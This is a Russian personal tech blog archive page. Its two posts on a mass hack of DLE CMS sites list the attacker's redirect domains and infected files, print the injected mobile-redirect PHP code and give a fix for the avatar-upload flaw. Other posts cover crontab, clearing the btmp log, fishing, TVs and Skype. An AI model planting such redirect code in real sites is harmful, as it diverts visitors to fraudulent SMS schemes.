Home › Category Archives › Новости
06Фев

Очередной взлом сайтов на DLE

Verner Новости, Советы 12 110 просмотров 1 comment

Ну вот не прошло и нескольких дней как хакер(предположительно с Украины) продолжил свою деятельность по взому сайтов на DLE.

В этот раз встраиваемый код стал немного другим.
Перенаправление происходит на несколько сайтов:

statuses.ws
live-internet.ws
googlecount.ws
livecountall.ws
googleinternet.ws
yacounter.ws
getinternet.ws
yandex-google.ws
ya-googl.ws
ya-analytics.ws
yadirect.ws

На этих сайтах происходит перенаправление пользователей зашедших с некоторых мобильных устройств, не со всех.

Перенаправление происходит на СМС агрегатора, который внедряет в ваш телефон приложение или вынуждает отправить платное СМС.

 

На этот раз инфицируются следующие файлы:

/index.php
/engine/data/dbconfig.php
/engine/data/config.php
/engine/init.php
/engine/engine.php
/language/Russian/website.lng

При этом взломщик предусмотрел возможность апгрейта своего скрипта встраиванием шелл кода в файлы.

Будьте внимательны!

 

 

 

 

 

23Янв

Взлом DLE загрузкой аватара с вредоносным кодом

Verner Новости, Советы 18 132 просмотров 1 comment

Этот новый год начался забавно.
Много лет в известном всем движке CMS DLE существовала уязвимость и никто на нее не обращал внимание. Но вот в начале этого года примерно с 6 января, видимо устав от празднования Нового года, хакер под псевдонимом tehApocalypse взломал несколько десятков тысяч сайтов на CMS DLE.

Взлом заключался во внедрении кода в несколько файлов DLE для перенаправления посетителей зараженных сайтов на сайт злоумышленника.

index.php
engine/engine.php
engine/init.php
engine/data/config.php
engine/data/dbconfig.php

Перенаправление происходило только для пользователей сматфонов и прочих продвинутых телефонов.

$iphone = strpos($_SERVER['HTTP_USER_AGENT'],"iPhone");
$android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");
$palmpre = strpos($_SERVER['HTTP_USER_AGENT'],"webOS");
$berry = strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry");
$ipod = strpos($_SERVER['HTTP_USER_AGENT'],"iPod");

if ($iphone || $android || $palmpre || $ipod || $berry === true) {
header('Location: http://statuses.ws/');
}

Итак как же исправить эту уязвимость в DLE?

В нескольких файлах, в которых мы можем редактировать профиль пользователя и загружать аватар для этого пользователя есть такой код:

 

if( $thumb->size_auto( $user_group[$member_id['user_group']]['max_foto'] ) ) {
$thumb->jpeg_quality( $config['jpeg_quality'] );
$thumb->save( ROOT_DIR . "/uploads/fotos/foto_" . $id . "." . $type );
} else {
@rename( ROOT_DIR . "/uploads/fotos/" . $id . "." . $type, ROOT_DIR . "/uploads/fotos/foto_" . $id . "." . $type );
}

Так вот все дело в этой строчке

@rename( ROOT_DIR . "/uploads/fotos/" . $id . "." . $type, ROOT_DIR . "/uploads/fotos/foto_" . $id . "." . $type );

Т.е. если аватар не надо изменять по размеру то исходный инжектированный файл копируется в первоначальном виде для дальнейшего использования.

Необходимо преобразовать этот блок кода в новый:

$thumb->size_auto( $user_group[$member_id['user_group']]['max_foto'] );
$thumb->jpeg_quality( $config['jpeg_quality'] );
$thumb->save( ROOT_DIR . "/uploads/fotos/foto_" . $id . "." . $type );

После этого загрузить аватар с вредоносным кодом будет невозможно.
Файлы для редактирования:

engine/inc/editusers.php
engine/modules/register.php
engine/modules/profile.php

Удачи!

11Янв

Crontab синтаксис

Verner CentOS, Новости 9 211 просмотров Комментарии к записи Crontab синтаксис отключены

Доступ в каталог /var/spool/cron непривилегированому пользователю закрыт, что бы посмотреть юзером «user» есть ли у него файл crontab, достаточно набрать команду crontab -l , если файл существует-будет показано его содержимое.

Для удаления файла используется команда crontab -r

Для редактирования crontab -e

Для управления файлами crontab пользователем «root» используется синтаксис:

crontab -u user_name file — создание файла crontab из файла «file» для  юзера «user_name»

-u означает чей crontab будет обработан, если опция не задана, то будет обработан crontab того пользователя,  который запустил команду crontab.

crontab -u user_name -l — просмотр файла crontab юзера «user_name»
crontab -u user_name -r — удаление файла crontab юзера «user_name»
crontab -u user_name -e — редактирование файла crontab  юзера «user_name» используя редактор, заданный переменной окружения VISUAL или EDITOR

Формат и значения полей

Каждая команда в пользовательском файле crontab занимает одну строку и состоит из шести полей. Пользовательские файлы crontab находятся в каталоге /var/spool/cron

Общий формат команды:

минута час день_месяца месяц день_недели команда

Допустимые значения:
минута от 0 до 59
час от 0 до 23
день_месяца от 1 до 31
месяц от 1 до 12 (можно три буквы из названия месяца,  регистр не имеет значения от jan до dec)
день_недели от 0 до 6  (0 это воскресенье,  можно писать от sun до sat)

Каждое из полей даты и времени может быть обозначено символом * , будет соответствовать любому возможному значению. Для этих полей можно указывать диапазоны значений, разделенных дефисом, например:
* 5 4-10 0-3 * echo «HELLO» — печать HELLO в 5:00 на 4,5,6,7,8,9,10 дни января, февраля, марта и апреля

пошаговая запись
* */2 * * sat echo «HELLO» — печать HELLO каждый четный час,   каждую субботу

равнозначная предыдущему примеру запись (списком)
* 0,2,4,6,8,10,12,14,16,18,20,22 * * sat echo «HELLO» — печать HELLO каждый четный час, каждую субботу

то же самое с указанием диапазона
* 0-23/2 * * sat echo «HELLO» -печать HELLO каждый четный  час, каждую субботу

59 23 31 dec * echo «Happy new year» —  поздравит с новым годом

Для отладки задания cron, можно перенаправить результат в файл

Пример:
0-59 * * * * /home/user/mail 2>/tmp/tmp.cron

Если при запуске команды /home/user/mail возникнут ошибки, то они будут записаны в файл /tmp/tmp.cron и вы всегда сможете узнать причину. В случае перенаправления вывода в файл, письмо, юзеру указаному в переменной MAILTO отправлено не будет.

Посмотреть информацию о всех командах запускаемых демоном cron можно в каталоге /var/log называются cron, cron1 и т.д.

В файле /var/log/cron записано время запуска всех заданий cron за предыдущий день
Mar 29 04:03:00 rst CROND[4434]: (user) CMD (/home/user/mail)
Mar 29 04:03:59 rst CROND[4493]: (user) CMD (/home/user/mail)
Mar 29 04:05:00 rst CROND[4507]: (user) CMD (/home/user/mail)
Mar 29 04:06:00 rst CROND[4549]: (user) CMD (/home/user/mail)

В остальных файлах cron1,cron2 находится подобная информация, но более старая чем в cron

Вот практически и все, что требуется знать для использования cron и crontab.

09Янв

Диски и резина из Японии

Verner Новости, Разное 7 276 просмотров 0 comment

Заказал я себе резину с дисками, оригинал для Mazda Tribute из Японии.

И решил найти продавца, чтоб удостовериться в «чистоте» товара.

Посмотрел фото магазина

и нашел этот магазин в гуглемэпс

Будем ждать посылочку…

24Дек

Как я провел конец света

Verner Новости 7 256 просмотров 0 comment

Решили мы с пользой для души и дела тела провести эти выходные, на которые по чистой случайности выпало 21 декабря 2012 года. Это совпадение считать чисто случайным.

Было решено поехать на рыбалку на таежное озеро Светлое.
Подьем в 4.45 утра, быстрый сбор и в путь.

Фотал на джигурду(JIAYU G3)

 В дорогу!

Поменяли транспорт, уже светает.

 

Заправка до полного бака не помешает никогда.

 

 Подъезжаем к ледовой переправе через р. Обь, ограничение по весу 10 тонн.

Едем себе так по деревне и тут вдалеке появляется…

 

 То-ли кремль, то-ли крепость…

 Не прошло и часа по зимней дороге, как мы на месте. Из машины вышли на всякий случай — какой лед толщины еще не знаем 🙂

Три дороги: налево, направо и прямо — куда не пойдешь везде рыба 🙂

 

Мороз крепчал с каждым часом. По общим ощущениям было ниже -35°С. Как потом и подтвердилось по приезду в город.

Пикуль на мотыльнице.

Ловили традиционно на мотыля, ну и на местного аборигена — пикуля. Пикуль это личинка стрекозы. Пикуля ловили на мертвую рыбу — вот такой круговорот в природе. Рыбу ловим на пикуля, а пикуля ловим на рыбу. Пикуль довольно прожорливый тип, при отсутствии еды он жрет своих сородичей, что помельче и послабее.

 День короткий, солнце показалось и почти сразу прячется.

Скай-ду еще на ходу 🙂

 

Наш транспорт для передвижения по озеру снегоход Ski-Doo Tundra LT 600 4-TEC на вторые сутки не завелся — не выдержал сибирских морозов. Последующие двое суток простоял на снегу.

Красотища!!!

В результате было поймано немного окуней и одна щука на жерлицу.

По дороге обратно сфотали строящийся монастырь, наверно по бюджету он превосходит бюджет всей деревни. Стены 4-5 метров, чтоб демоны не напали 🙂

А вот и дорога назад, домой…

 

Конец света прошел не зря!

10Апр

Очки дополнительной реальности от Google

Verner Новости 5 577 просмотров 0 comment

Google аннонсировала тест очков дополнительной реальности.

Эти очки позволяют дополнить нашу повседневную жизнь новыми информационными гаджетами. Часть из них основывается на уже существующих сервисах от Google, например таких как Google карты.
Будет использоваться геоориентированный планировщик задач для записи намеченных встреч или свиданий.
Будет возможно использовать подсказки при передвижении как у навигационных систем.

Компания Google предлагает поучаствовать всем желающим в разработке нового гаджета и предложить все возможные  опции для очков дополнительной реальности.

20Окт

btmp — файл в linux

Verner linux, Новости 33 159 просмотров 3 комментария

Есть такой файл в некоторых ОС на базе *nix.
Этот файл содержит логи неудачных попыток входа в систему.

Для корректного обновления этого файла у вас должен быть настроен файл конфигурации logrotate.conf примерно таким образом:


/var/log/btmp {
monthly
minsize 1M
create 0600 root utmp
rotate 1
}

Для просмотра файла используем команду:

last -f /var/log/btmp

Вы можете изменить количество создаваемых лог файлов в параметре rotate.
Обычно мы можем наблюдать в этом файле попытки подбора имени и пароля для входа в систему.
Для очистки лога используем команду:

cat /dev/null > /var/log/btmp

28Сен

Частота развертки современных телевизоров

Verner Новости, Разное, Советы 8 543 просмотров 0 comment

Сравним две технологии для вывода изображения на экран телевизора 50Гц и 100 Гц.

 
Изображениеодного кадра по действующему стандарту телевещания передается в два приема: двумя полукадрами, через строку – сначала все нечетные строки, а во второй этап – все четные. Это называется чересстрочной разверткой. Полукадры передаются с частотой 50 Гц.

Примерно вот так

А это все вместе

Основные недостатки при выводе изображения с частотой развертки 50 Гц это  эффект «мерцания», кроме того и горизонтальные линии «дрожат» с частотой 25 Гц. Это особенно заметно при сравнении телевизора и монитара компьютера(у современных мониторов частота выше 60 Гц).
Эти недостатки тем заметнее, чем больше размер экрана Вашего телевизора.

Технология 100 Гц. – это цифровая технология, которая обеспечивает обновление экрана в 2 раза чаще, чем при 50 Гц-ой технологии, т.е. «полукадры» появляются в 2 раза чаще. Видеосигнал представленный в цифровой форме предоставляет гораздо более широкие возможности обработки, чем аналоговый. Например, можно запомнить представленный в цифровой форме кадр изображения и в нужное время воспроизвести его. Эта технология позволяет решить проблему мерцания изображения на экране. Дело в том, что при частоте смены полукадров (полей) 50 (60) Гц, мерцание изображения, особенно на ярких участках, все же остается заметным.
 
Все же эта система так же не лишена недостатков: при чередовании полукадров первый — первый — второй — второй, переход от нечетных к четным строкам происходит с прежней частотой 50 Гц. Это проявляется в дрожании верхних и нижних краев деталей изображения из-за чередования четных и нечетных строк.

Преодолеть этот недостаток позволяет усовершенствованная система, получившая название Digital Scan, в которой полукадры чередуются в последовательности первый — второй — первый — второй. В этом случае частота смены полукадров с четными и нечетными строками составляет уже 100 Гц, и дрожание становится практически незаметным.
Кроме того технология 100 Гц имеет несколько минусов, среди которых оцифровка изображения и цифровой шлейф при быстром передвижении объектов. Для лучшей передачи быстро меняющихся изображений в телевизорах с разверткой 100 Гц применяются специальные технологии цифровой обработки сигналов, такие как Digital Scan с функцией Natural Motion (Philips), Digital Plus (Sony), Digital Mastering и Intelligent Mastering (Thomson), Digital Scan и Super Digital Scan (Panasonic), Full Digital с системой DMI (Digital Motion Interpolation) (Loewe) и другие. В этих системах по специальному алгоритму происходит создание промежуточного кадра, который вставляется между теми кадрами, из которых он формируется. В результате быстро перемещающиеся объекты на экране выглядят более естественно. При этом следует отметить, что 100 Гц модели, не оснащенные этими технологиями, зачастую уступают по качеству изображения 50 Гц.

27Июн

Сон в руку?

Verner Новости 8 599 просмотров 1 comment
 Конец света. Начало сентября 1993.
 

 

За окном было серо. Сложно было определить время года: было сухо, температура средняя — ни холодно, ни жарко. Время суток было определить сложно. 
Я сидел в комнате или квартире на первом этаже, т.е. выйти на улицу можно было прямо из комнаты. В комнате была недорогая утварь. Было не грязно, но и блестящей чистоты тоже не было. В общем, серо было в комнате и за окном.  
Я вышел на улицу, причем окна дома выходили на пустырь, видимо, это была окраина города. Еще в доме я почувствовал что-то неладное, хотя тревоги или страха не было. На улице было много людей, все копошились, как в муравейнике перед дождем.
  » Read more…
22Дек

Удаляем определитель номера SkypeNames2.exe

Verner Новости 5 757 просмотров 0 comment

Есть такой плагин для Internet Explorer’а от Skype, который преобразует и выводит в удобочитаемом виде номера телефонов на веб страничках.

Имя ему SkypeNames2.exe 

Как отключить этот плагин?

1. Открываем IE
2. Заходим Сервис -> Надстройки
3. Находим группу от Skype Technologies SA и отключаем
Skype add-on for IE
Skype add-on for Internet Explorer
4. Закрываем и открываем IE

Все плагин болше не будет вас беспокоить.